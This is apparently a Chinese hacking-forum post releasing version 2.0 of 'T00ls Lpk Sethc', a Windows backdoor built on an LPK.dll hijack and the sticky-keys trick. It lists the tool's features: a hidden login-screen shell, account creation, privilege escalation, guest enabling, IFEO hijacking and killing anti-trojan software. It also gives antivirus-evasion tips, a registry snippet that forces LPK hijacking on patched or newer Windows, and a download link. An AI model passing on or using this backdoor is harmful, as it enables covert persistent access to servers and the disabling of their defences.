T00ls Lpk Sethc 全新v2.0版(附LPK提权)

不知道LPK是什么的请到http://rices.so/1608-04-28.html查看!程序的基础用法也请先看上个版本的介绍!附上2.0版本的测试视频:http://rices.so/lpk2.html

先说几句吧,由于1.0做的实在粗糙,而且当时我也只在一台服务器上测试,发现没有问题就直接发了..

结果导致对很多服务器的非常不兼容!比如内存错误,或者开一下就关什么的,在吸取了很多朋友的建议以后2.0版本来了,首先要保证的是兼容性,只要系统可以劫持LPK,就可以保证程序稳定运行(执行CMD,API加帐号的),只要粘滞键为可用状态,可以保证100%劫持!完全兼容(2K/2K3/XP/08/VISTA/WIN7)..

其次吸取了一些人的建议,觉得有的系统确实不支持sethc,所以增加了全新的LPK提权功能(可直接执行CMD/API加帐号!)其他的就是一些小功能了,比如内置了结束星外杀马以及在粘滞键运行权限不可用的时候解除限制!还有就是有的朋友觉得3键不好按,所以这次可以设置2键或者3键启动!





这次没有模仿粘滞键的界面了,看到了土司某个帖子,直接调用粘滞键,这才是100%的高仿:)





还是先5下shift呼出粘滞键,然后再同时按下设置的启动热键,那么密码窗口就出来了!





这次的后门增加了一些常用功能,首先要说的是可以自定义CMD的路径了!不会再担心什么CMD被锁等!





附两张WIN7下的后门运行图片,完全兼容:









另外增加的开GUEST和IFEO劫持等可以看测试视频,就不多截图了.修复了下直捣黄龙功能,直接进桌面以及隐藏winlogon窗口!

其他说明：

1.免杀的话请直接针对目录下的LPK.DAT文件进行处理即可

2.针对无SETHC.EXE文件的系统,粘滞键后门将无法正常启动(如果已经拿到服务器的情况下建议自行拷贝系统粘滞键到服务器的SYSTEM32目录!以保证后门的正常启动)

3.无SETHC.EXE文件的系统完全不影响LPK的使用,CMD照样执行,帐户也照样加!

4.密码依然采用32位MD5加密,只要密码强度够,后门被下载也无济于事!

5.热键比如同时按下,而不是先按下A键,再按下B键!否则无法呼出!

6.为何不写感染?因为本工具初衷就是后门和辅助提权,如果严重破坏到系统就不好了!

针对03/XP打了补丁导致LPK无法劫持的解决办法(感谢Hmily牛的封LPK劫持的帖子)以及针对08/WIN7/VISTA系统默认不支持LPK的解决办法将以下内容保存为REG导入后重启即可!

Windows
Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager]

“ExcludeFromKnownDlls”=hex(7):6c,00,70,00,6b,00,2e,00,64,00,6c,00,6c,00,00,00,\

00,00

大小:

原大小:200K

UPX处理后大小:58K

功能和兼容和1.0相比是质的飞跃,但大小和1.0相同,依然精湛!

特别致谢:

感谢原帖子zafe的问题反映,所以才会想到直接在LPK上加CMD等辅助功能,感谢原帖子bin4ry提供的功能(注册表,任务管理器等),感谢PS7ISY(部分功能看了他的后门才想到的~),感谢原帖evildns的思路(开guest),感谢原帖golds7n提供的窗口样式,虽然没有模仿界面,不过其他地方用上了!

最后感谢小e同学陪我多次测试,adsltsee的测试,clouds的思路,败家的思路,感谢群里的f4tb0y一直催..

下载:http://rices.so/T00ls
Lpk Sethc v2.rar